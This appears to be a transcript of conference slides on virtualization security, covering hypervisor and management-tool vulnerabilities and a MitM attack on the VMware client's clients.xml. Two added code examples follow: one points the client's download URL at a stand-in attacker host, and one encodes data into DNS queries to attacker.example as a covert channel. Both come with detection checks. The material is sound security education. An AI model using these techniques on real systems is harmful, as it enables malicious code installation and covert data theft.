TRANSCRIPT
The Glass Cage: Virtualization security
Claudio Criscione
Nibble Security
What is this speech about?
Breaking out of the cage vendors are trying to put on your mind!
Virtualization in 3 Minutes
Hardware
Hypervisor
Host Operating System
Design in the virtualization era
Mail Server
Web Server
DNS Server
Firewall
The Original Sin
The original sin: believing that the security of a virtual environment is the same as that of a physical one
It is very practical to think about the cloud
It is not really there!
What you have is more systems
If it bleeds...
Hypervisors are running on top of “standard” OS
Linux, Windows 2008, Nemesis
And they are running services as well!
VMSA-0008-0002.1: Patches Virtual Center, running Tomcat 5.5.17
VMSA-0008-0015: Patches remote buffer overflow in openwsman
CVE-2007-1321: Heap overflow in Xen NE2000 network driver
Hyper-V: SMBv2 anyone?
More than just Hypervisors
There's a whole ecosystem around virtualization
Management software, storage managers
Patchers, conversion software
All of them can be hacked!
SN-2009-02 - ToutVirtual VirtualIQ Pro Multiple Vulnerabilities
Insecure clients
Client security
The attack surface is quite large
SSL, web services
Rendering engines, integration and plugins
Auto-update functionality
MITM against clients? Why not!
With or without null byte
/client/clients.xml
Requested every time VI client connects to a host
<ConfigRoot>
  <clientConnection id="0000">
    <authdPort>902</authdPort>
    <version>3</version>
    <patchVersion>3.0.0</patchVersion>
    <apiVersion>3.1.0</apiVersion>
    <downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl>
  </clientConnection>
</ConfigRoot>
What if we change that XML?
By MitM, or
Post-exploitation on the host
Demo time
Just woke up? Here's what's going on
VI Client looks for clients.xml
We do some MiTM
We use Burp because it rocks and it's easy
Change the clients.xml: p0wned
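The rewrite the demo performs, and the client-side check that would have caught it, as an added example (not code from the talk or from VMware). It parses the clients.xml shown above; the server name esx01.example.net and the attacker URL are hypothetical, and the `*` placeholder in the original downloadUrl is filled with the host the client connected to.

```python
"""Added example: the clients.xml rewrite performed by a MitM proxy (Burp in the
talk's demo), and a client-side sanity check that rejects the rewritten document.

Assumptions (hypothetical): the VI client connected to SERVER_HOST over HTTPS and
will download and run whatever <downloadUrl> points at. ATTACKER_URL is made up.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

SERVER_HOST = "esx01.example.net"            # hypothetical ESX/VirtualCenter host
ATTACKER_URL = "http://attacker.example/VMware-viclient.exe"  # hypothetical

# The clients.xml from the talk; '*' stands for the host the client connected to.
ORIGINAL_CLIENTS_XML = """<ConfigRoot>
  <clientConnection id="0000">
    <authdPort>902</authdPort>
    <version>3</version>
    <patchVersion>3.0.0</patchVersion>
    <apiVersion>3.1.0</apiVersion>
    <downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl>
  </clientConnection>
</ConfigRoot>""".replace("*", SERVER_HOST)


def rewrite_download_url(xml_text: str, new_url: str) -> str:
    """What the MitM does to the response in flight: point every <downloadUrl>
    at the attacker's installer. Everything else in the document is untouched,
    so a client that only looks at version fields sees nothing odd."""
    root = ET.fromstring(xml_text)
    for node in root.iter("downloadUrl"):
        node.text = new_url
    return ET.tostring(root, encoding="unicode")


def check_download_url(xml_text: str, connected_host: str) -> list:
    """Client-side check the auto-update path is missing: the installer must come
    over HTTPS and from the very host we are already talking to. Returns a list
    of findings; an empty list means the document passes."""
    findings = []
    root = ET.fromstring(xml_text)
    for node in root.iter("downloadUrl"):
        url = urlparse((node.text or "").strip())
        if url.scheme != "https":
            findings.append("download URL is not HTTPS: %s" % node.text)
        if url.hostname != connected_host:
            findings.append("download host %r differs from connected host %r"
                            % (url.hostname, connected_host))
    return findings


def demo():
    """Run the attack against the check: original passes, rewritten does not."""
    tampered = rewrite_download_url(ORIGINAL_CLIENTS_XML, ATTACKER_URL)
    return (check_download_url(ORIGINAL_CLIENTS_XML, SERVER_HOST),
            check_download_url(tampered, SERVER_HOST))


if __name__ == "__main__":
    clean, bad = demo()
    print("original:", clean or "ok")
    print("tampered:", bad)
```

The host check only helps if the TLS session to the connected host was itself verified; an attacker who can already MitM the HTTPS connection (the null-byte certificate trick the slide alludes to, or a user clicking through a warning) controls both the XML and the download. The durable fix is for the client to verify the installer's code signature before executing it, independent of where it was fetched from.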
Administrative Interface Security
Glass windows in the castle
Some of them are even hidden...
...and some of them are broken.
XEN Center Web
Multiple vulnerabilities in the default installation
RCE, File inclusion, XSS
SN-2009-01 – Alberto Trivero & Claudio Criscione
People were actually using it, over the internet
But now it's gone...
VMware Studio
A virtual appliance to build other virtual appliances
Path traversal leading to unauthenticated arbitrary file upload to any directory
SN-2009-03 by Claudio Criscione
Virtualization ASsessment TOolkit
A toolkit for virtualization penetration testing
Currently under development @ Secure Network
Metasploit based
Still in early Alpha stage
Stable modules: Fingerprinting, Brute Forcer
VMware Studio Exploiter
Let's see them (if we have time!)
Everyone has got some...
Ubuntu just launched its Cloud infrastructure
It leverages Eucalyptus
And we have (at least) an XSS in Eucalyptus
VM Hopping
You already knew about that, or at least thought about that
It already happened multiple times, e.g.
CloudBurst on VMware
CVE-2007-1320 on XEN: overflow in Cirrus VGA. See a pattern?
Virtual Appliances
Monitoring systems
Virtual Appliances + Monitoring = Nice Example
Astaro virtual firewall
One pre-auth request to the HTTP interface will result in Astaro doing a DNS query
We won't get the results, but it's a nice one-way covert channel for any blind attack (thanks ikki)
What's most important, no IDS in the network will detect any anomaly. It's all in-memory
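The one-way DNS covert channel described above, in the abstract, as an added example that is not code from the talk and says nothing Astaro-specific: the attacker gets the target to resolve a name of the attacker's choosing, and reads the data back from the query that reaches the attacker's authoritative server. The zone x.attacker.example, the payloads and the label-length threshold in the detector are hypothetical.

```python
"""Added example: encoding data into a DNS query name for a blind, one-way
channel, decoding it at the authoritative server, and a crude resolver-log
heuristic for spotting such names. Zone and payloads are hypothetical."""
import base64

ATTACKER_ZONE = "x.attacker.example"   # hypothetical zone whose NS the attacker runs
MAX_LABEL = 63                          # RFC 1035 label length limit
MAX_NAME = 253                          # practical limit for a full name


def encode_query_name(payload: bytes, zone: str = ATTACKER_ZONE) -> str:
    """Turn bytes into a resolvable name under the attacker's zone. base32 is
    used because DNS names are case-insensitive and resolvers may fold case;
    padding is stripped and restored by the decoder."""
    data = base64.b32encode(payload).decode("ascii").rstrip("=").lower()
    labels = [data[i:i + MAX_LABEL] for i in range(0, len(data), MAX_LABEL)]
    name = ".".join(labels + [zone])
    if len(name) > MAX_NAME:
        raise ValueError("payload too large for one query; chunk it and add a sequence label")
    return name


def decode_query_name(name: str, zone: str = ATTACKER_ZONE) -> bytes:
    """What the attacker's nameserver does with the QNAME it receives."""
    name = name.rstrip(".").lower()
    if not name.endswith("." + zone):
        raise ValueError("query is not for our zone")
    data = "".join(name[: -len(zone) - 1].split(".")).upper()
    data += "=" * (-len(data) % 8)      # restore base32 padding to a multiple of 8
    return base64.b32decode(data)


def blind_probe_name(probe: str, result: bool) -> str:
    """A blind attack only needs to leak one bit per probe: encode the probe id
    and its outcome into the name the target will resolve."""
    return encode_query_name(("%s=%d" % (probe, int(result))).encode())


def suspicious_name(name: str, max_label: int = 30) -> bool:
    """Resolver-log heuristic (hypothetical threshold): ordinary hostnames rarely
    carry labels this long, encoded data routinely does."""
    return any(len(label) > max_label for label in name.rstrip(".").split("."))


if __name__ == "__main__":
    q = encode_query_name(b"uid=0(root)")
    print(q, "->", decode_query_name(q))
    print(blind_probe_name("is_admin", True), suspicious_name(q))
```

The appliance side of the attack really is all in memory, as the slide says, but the query itself has to leave the box: a resolver or firewall that logs outbound DNS is the one place the channel is visible, and long or many-labelled names under a single unknown zone are the thing to look for there.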
Templates
So what
Virtualization Management Review
Virtualization Architecture Review
And now you know VASTO is coming
What about management issues?
VM Sprawl
Segregation of duties